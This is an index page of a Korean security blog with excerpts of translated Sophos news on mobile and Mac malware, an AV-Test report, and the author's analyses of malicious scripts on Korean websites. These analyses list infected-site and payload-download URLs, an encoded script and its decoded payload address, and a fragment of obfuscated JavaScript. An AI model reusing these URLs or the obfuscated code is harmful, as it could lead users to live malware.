본문 바로가기

security

[Sophos] 앵그리버드 스페이스 게임으로 위장한 안드로이드 맬웨어 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=16400 앵그리버드 스페이스 게임으로 위장한 안드로이드 맬웨어안드로이드 맬웨어 제작자가 엄청나게 인기 있는 “앵그리 버드(Angry Birds)” 게임 시리즈의 최신작을 출시했다고 하면서 의심을 하지 않는 스마트폰 사용자를 감염시킬 기회를 포착하였습니다.소포스랩은 최근에 비공식적인 안드로이드 앱스토어에 올라가 있는 맬웨어에 감염된 “앵그리버드 스페이스(Angry Birds Space)” 게임 버전을 접하게 되었습니다. 공식적인 안드로이드 마켓(최근에 “구글 플레이(Google Play)”로 이름이 바뀜)에 있는 “앵그리버드 스페이스”는 감염되지 않았습니다.소포스가 Andr/Kon.. 더보기
[Sophos] Mac 맬웨어 유포에 사용되곤 하는 상반신 누드의 슈퍼모델 사진들 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=16100 컴퓨터 사용자들을 속여서 그들을 위험에 노출시키는 파일을 클릭하거나 악성 코드를 설치하는데 악용합니다. 예를 들어, 우리가 봤던 가장 최신의 Mac 멜웨어를 한번 보십시오. OSX/Imuler-B 라는 맬웨어는 나쁜 목적으로 슈퍼모델 이리나 샤크(Irina Shayk)의 사진을 이용합니다.(나는 그녀에 대해 들어본 적이 없지만 듣자 하니 그녀는 FHM 남성잡지의 2012년 3월호의 표지걸이라고 합니다.) 다음은 OSX/Imuler-B 트로이목마가 옮긴 파일의 스크린샷 입니다. 여러분은 그 아이콘이 (그녀의 카디건을 집에 놔두고 온 것처럼 보이는)이리나 샤크인 것을 숨김 .. 더보기
[Sophos] 마이크로소프트: 치명적인 웜 취약점이 30일 내에 악용될 수 있습니다. 원본 보기 : http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=16000 마이크로소프트: 치명적인 웜 취약점이 30일 내에 악용될 수 있습니다. 들어보세요. 이건 심각한 일입니다. Windows의 많은 버전들에는 치명적인 취약점이 있는데, 그것은 취약한 컴퓨터들간에 자동으로 웜을 퍼트리기 위해 악용될 수 있습니다. 마이크로소프트는 취약한 PC의 소유자가 긴급한 사안으로 그들의 컴퓨터를 고치도록 재촉하며, 패치를 발표 하였습니다. 그 취약성은 RDP(Remote Desktop Protocol)라 불리는 Windows의 기능에 대한 것이고, 악의적인 해커들이 사용자의 허가 없이 코드를 실행할 수 있도록 합니다. 그것은 사용자가 믿고.. 더보기
[AV - Test] Test Report : Anti-Malware solutions for Android March 2012 http://www.av-test.org/fileadmin/pdf/avtest_2012-02_android_anti-malware_report_english.pdf The growth of the AV-TEST collection of Android malware Average Family Detection : 90 % A avast! Free Mobile Security : VERYGOOD A Dr.Web anti-virus Light : VERYGOOD A F-Secure Mobile Security : VERYGOOD A IKARUS mobile.security LITE : VERYGOOD A Kaspersky Mobile Security : VERYGOOD A Lookout Security & A.. 더보기
악성 스크립트 새로운 암호화 방식 ?? 우연히 들어온 사이트중... 하나 스크립트중 신기한게 있어서 써본다..... 나도 어떻게 해결하는 방법인지는 아직 찾지 못하고 있다...... 어떻게 하는거지?? 나도 잘 모르겠다.... 원본 Script 0500520581041161161120580470470540490460500530490460490560550460490550540471071 14047102105108101115047109122046106112103 해독시 ! http://61.251.187.176/kr/files/mz.jpg ~> 현재 접속 불가 ! 참고한 블로그 : http://jjoon.net/tc/343 Decode 참고 사이트 : http://119.194.217.188:8080/Honeypot/ 해결법이 있네요 : ) 참조.. 더보기
http://ad.nsonmedia.com 내의 악성 스크립트 삽입 ! 감염 사이트 : http://ad.tiad.co.kr/mt2.html * 위 사이트는 현재도 감염중에 있습니다! 메인 사이트 : http://ad.tiad.co.kr/mt2.htm0 http://jips.kips.or.kr/ad.htm0 최종파일 다운 : http://61.251.187.176/kr/files/java.ex0 : http://jips.kips.or.kr/Applet.ja0 ~> JAVA 취약점 ~> temp%//happy.vbs 생성 http://jips.kips.or.kr/down.htm0 최종파일 다운 : http://61.251.187.176/kr/files/004.ex0 MID 취약점 다운로드 : http://jips.kips.or.kr/test_case.mi0 ~> MID 취약점.. 더보기
[Sophos] TV나 영화에서 봤었던 바이러스와 해킹 원본 링크 : http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=15400 컴퓨터 시큐리티 업계에서 일하다 보면, TV나 영화상에서 잘못 전해지는 맬웨어나 해킹을 자주 보곤 합니다. 일반적으로 맬웨어는 꽤 단조로운 게 사실입니다. 눈에 보이는 것도 많지 않고(결국, 맬웨어 일부가 나타나면, 컴퓨터 주인은 그들이 감염되었다고 확신하게 됩니다.), 일반적으로 어떤 손상도 화면상에 보여주기가 어렵습니다. 스푹스와 디도스 잠수함(Spooks and the DDoS submarine) MI5(영국 정보국)의 복잡한 생활을 그린 BBC TV드라마 “스푹스(Sppoks)는 여러 가지 상황에서(거의 항상 비현실적으로) 맬웨어와 해킹을 재미 삼아.. 더보기
clsid:d27cdb6e-ae6d-11cf-96b8-444553540000 포함된 Script 감염 사이트 : http://www.imslow.kr/ghost/index.html * 악성 링크이니 조심하시기 바랍니다! clsid:d27cdb6e-ae6d-11cf-96b8-444553540000 clsid:d27cdb6e-ae6d-11cf-96b8-444553540000 {D27CDB6E-AE6D-11CF-96B8-444553540000} Updated: March 28, 2003 Applies To: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2 HKLM\Software\Policies\Microsoft\Windows\CurrentVersion\Internet.. 더보기
[Sophos] 페이스북 로고가 분홍이나 빨강, 혹은 검정색으로 변했다고요? 온라인 스캠에 빠지지 마세요 원본 : http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=15200 여러분 페이스북 친구들이 여러분의 따분한 파란색 페이스북 프로필을 매력적인 색상의 빨강, 검정 혹은 분홍색으로 바꾸려고 여러분을 초대한 적이 있나요? 네이키드 시큐리티 팀이 지난 몇 일 동안 스캠에 의해 피해를 입은 페이스북 사용자들로부터 받은 수많은 메시지들로 판단해 보면, 많은 소셜 네트워킹 사용자들은 틀림없이 다음과 비슷한 메시지들을 받았을 것입니다.: 그런데 이들 링크 중 하나를 클릭하면 무슨 일이 일어날까요? 전형적으로, 페이스북의 다른 색조를 얻기 위해 여러 단계를 거쳐야만 한다는 것을 알게 될 것입니다. 첫 번째로, 여러분은 온라인 친구들에게 그 링.. 더보기
HTML/Infected.WebPage.Gen2 APNIC KR 감염 사이트 : http://yxlgok.net/bbs/board.php? bo_table=board_free&wr_id=78&sfl=&stx=&sst=wr_hit&sod=desc&sop=and&page=3 메인 스크립트중 ! 이상한 스크립트 발견 ! function c102916999516m494180f401f90(m494180f40275f){ var m494180f402f30=16; return (parseInt(m494180f40275f,m494180f402f30));}function m494180f403ed1(m494180f4046a2){ function m494180f405e13(){return 2;} var m494180f404e72='';m494180f406db4=String.fromChar.. 더보기